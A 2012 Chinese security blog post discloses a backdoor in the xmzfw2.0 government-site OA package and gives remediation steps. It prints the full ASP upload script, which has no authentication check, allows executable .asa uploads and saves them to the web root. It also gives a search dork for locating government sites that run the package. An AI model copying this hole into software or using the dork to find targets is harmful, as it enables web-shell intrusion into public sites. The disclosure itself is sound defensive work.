博主呓语:

夏茂政府网集成OA完整开源版xmzfw2.0 内置后门

Posted by 破冰 on 2012-6-8 0:55 Friday
后门文件:HXINCLUDE/Admin_Upfile.asp
<%
  ' Page preamble for the upload script: output buffering on, an effectively
  ' unlimited script timeout, and page-level error suppression.
  Response.Buffer = True
  ' 9999999 seconds: the ASP engine will practically never time this request out.
  Server.ScriptTimeOut=9999999
  ' Runtime errors are skipped from here on unless the code inspects Err itself.
  ' NOTE(review): no login/session check appears here or anywhere later in this listing.
  On Error Resume Next
%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<meta http-equiv="Content-Language" content="zh-cn" />
<meta content="all" name="robots" />
<meta name="author" content="文件上传" />
<meta name="description" content="文件上传" />
<meta name="keywords" content="文件上传" />
<style type="text/css">
<!--
body,input {font-size:12px;}
-->
</style>
<title>文件上传脚本</title>
</head>
<body id="body">
<%
  ' Upload handler: parses the raw multipart/form-data body by hand and writes the
  ' uploaded part to disk under SavePath.
  '
  ' Security-relevant observations (all from the lines below):
  '   * No authentication or session check is visible before the body is processed.
  '   * The extension allow-list contains "asa". On default IIS script mappings .asa is
  '     handled by the ASP engine, so such an upload is served as server-side script.
  '   * SavePath is "/", i.e. files land in the web root, which is script-executable.
  '   * The stored name is taken from the client-supplied part header.
  ' CheckAndCreateFolder, CheckFileExt and CheckFileExists are not defined in this
  ' listing; their exact behaviour cannot be confirmed from here.
  ' Hardening: remove the page or gate it behind the admin session check, drop every
  ' script-mapped extension from the list, and store uploads where scripts cannot run.
  '
  ' NOTE(review): the [color=Red]...[/color] tags on the next line are the blog's
  ' highlighting markup, not part of the shipped script, and the ExtName and SavePath
  ' assignments appear to have been merged onto one line by the page rendering.
 [color=Red] ExtName = [color=Red]"jpg,gif,txt,asa" [/color]   '允许扩展名[/color]  SavePath = "/"          '保存路径
  If Right(SavePath,1)<>"/" Then SavePath=SavePath&"/" 'append a trailing (/) to the directory
  CheckAndCreateFolder(SavePath)

  UpLoadAll_a = Request.TotalBytes 'size in bytes of the whole client request body
  If(UpLoadAll_a>0) Then
    ' Load the entire request body into a binary stream (Type 1 = adTypeBinary).
    ' No size limit is applied before reading.
    Set UploadStream_c = Server.CreateObject("ADODB.Stream")
    UploadStream_c.Type = 1
    UploadStream_c.Open
    UploadStream_c.Write Request.BinaryRead(UpLoadAll_a)
    UploadStream_c.Position = 0

    ' Locate the first two CRLFs: the end of the boundary line and the end of the
    ' first part-header line.
    FormDataAll_d = UploadStream_c.Read
    CrLf_e = chrB(13)&chrB(10)
    FormStart_f = InStrB(FormDataAll_d,CrLf_e)
    FormEnd_g = InStrB(FormStart_f+1,FormDataAll_d,CrLf_e)

    ' Copy the first part-header line, minus its final byte (presumably the closing
    ' quote of filename="..."), and decode it as GB2312 text (Type 2 = adTypeText).
    Set FormStream_h = Server.Createobject("ADODB.Stream")
    FormStream_h.Type = 1
    FormStream_h.Open
    UploadStream_c.Position = FormStart_f + 1
    UploadStream_c.CopyTo FormStream_h,FormEnd_g-FormStart_f-3
    FormStream_h.Position = 0
    FormStream_h.Type = 2
    FormStream_h.CharSet = "GB2312"
    FormStreamText_i = FormStream_h.Readtext
    FormStream_h.Close

    ' File name = everything after the last backslash of that header line.
    ' The value is client-controlled and gets no further normalisation here.
    FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"\")+1,FormEnd_g)

    ' The only gate on the upload is this extension check against ExtName.
    If(CheckFileExt(FileName_j,ExtName)) Then
      SaveFile = Server.MapPath(SavePath & FileName_j)

      ' With error suppression active, any error raised by the statements above
      ' first becomes visible at this test.
      If Err Then
        Response.Write "文件上传: <span style=""color:red;"">文件上传出错!</span> <a href=""" & Request.ServerVariables("URL") &""">重新上传文件</a>"
        Err.Clear
      Else
        SaveFile = CheckFileExists(SaveFile)

        ' k: offset just past the blank line that ends the part headers.
        ' l: length of the file data, up to the next occurrence of the boundary line
        '    (taken as the first FormStart_f-1 bytes of the body) minus the CRLF.
        k=Instrb(FormDataAll_d,CrLf_e&CrLf_e)+4
        l=Instrb(k+1,FormDataAll_d,leftB(FormDataAll_d,FormStart_f-1))-k-2
        FormStream_h.Type=1
        FormStream_h.Open
        UploadStream_c.Position=k-1
        UploadStream_c.CopyTo FormStream_h,l
        ' Option 2 = adSaveCreateOverWrite: an existing file at SaveFile is replaced.
        ' The content is written as received; nothing inspects it.
        FormStream_h.SaveToFile SaveFile,2

        ' NOTE(review): SaveFileName derives from the client-supplied name and is
        ' written into the HTML response without Server.HTMLEncode.
        SaveFileName = Mid(SaveFile,InstrRev(SaveFile,"\")+1)
        Response.write "文件上传: <span style=""color:red;"">" & SaveFileName & " </span>文件上传成功! <a href=""" & Request.ServerVariables("URL") &""">继续上传文件</a>"
      End If
    Else
      Response.write "文件上传: <span style=""color:red;"">文件格式不正确!</span> <a href=""" & Request.ServerVariables("URL") &""">重新上传文件</a>"
    End If

  ' Empty request body: fall through to the upload form rendered below.
  Else
%>
<script language="Javascript">
<!--
// Browser-side convenience check for the upload form: refuses to submit while no
// file has been chosen. It runs only in the client, so it is not a security
// control; the server-side handler must enforce every restriction itself.
// Returns true when a file is selected, false (after an alert and refocus) otherwise.
function ValidInput()
{
  var fileField = document.upform.upfile;

  if (fileField.value != "") {
    return true;
  }

  alert("请选择上传文件!");
  fileField.focus();
  return false;
}
// -->
</script>
<form action='<%= Request.ServerVariables("URL") %>' method='post' name="upform" onsubmit="return ValidInput()"  enctype="multipart/form-data">
文件上传:
<input type='file' name='upfile' size="40"> <input type='submit' value="上传">
</form>
<%
  ' Closes the If(UpLoadAll_a>0) block opened in the upload handler above.
  End if
  ' Release the stream objects.
  Set FormStream_h = Nothing
  ' NOTE(review): the upload stream was created as UploadStream_c; UploadStream is never
  ' assigned in this listing, so these two lines do not close it. The failing Close call
  ' is hidden by the On Error Resume Next at the top of the page.
  UploadStream.Close
  Set UploadStream = Nothing
%>
</body>
</html>

谷歌或者百度 inurl:a125_news.asp N多政府站点在使用,一些已经被挂黑链了;

允许扩展名那里有亮点:直接允许上传 asa(IIS 默认把 .asa 当作 ASP 脚本解析执行)……无语喔。

解决办法:查杀一下整个代码包,后门和漏洞可能不止这一个,最好是别用这个玩意……有修复的精力都够重新做一个站了。已经上线的站点应先删除或限制访问这个上传页面,并检查站点根目录下有没有来历不明的 asa/asp 文件。
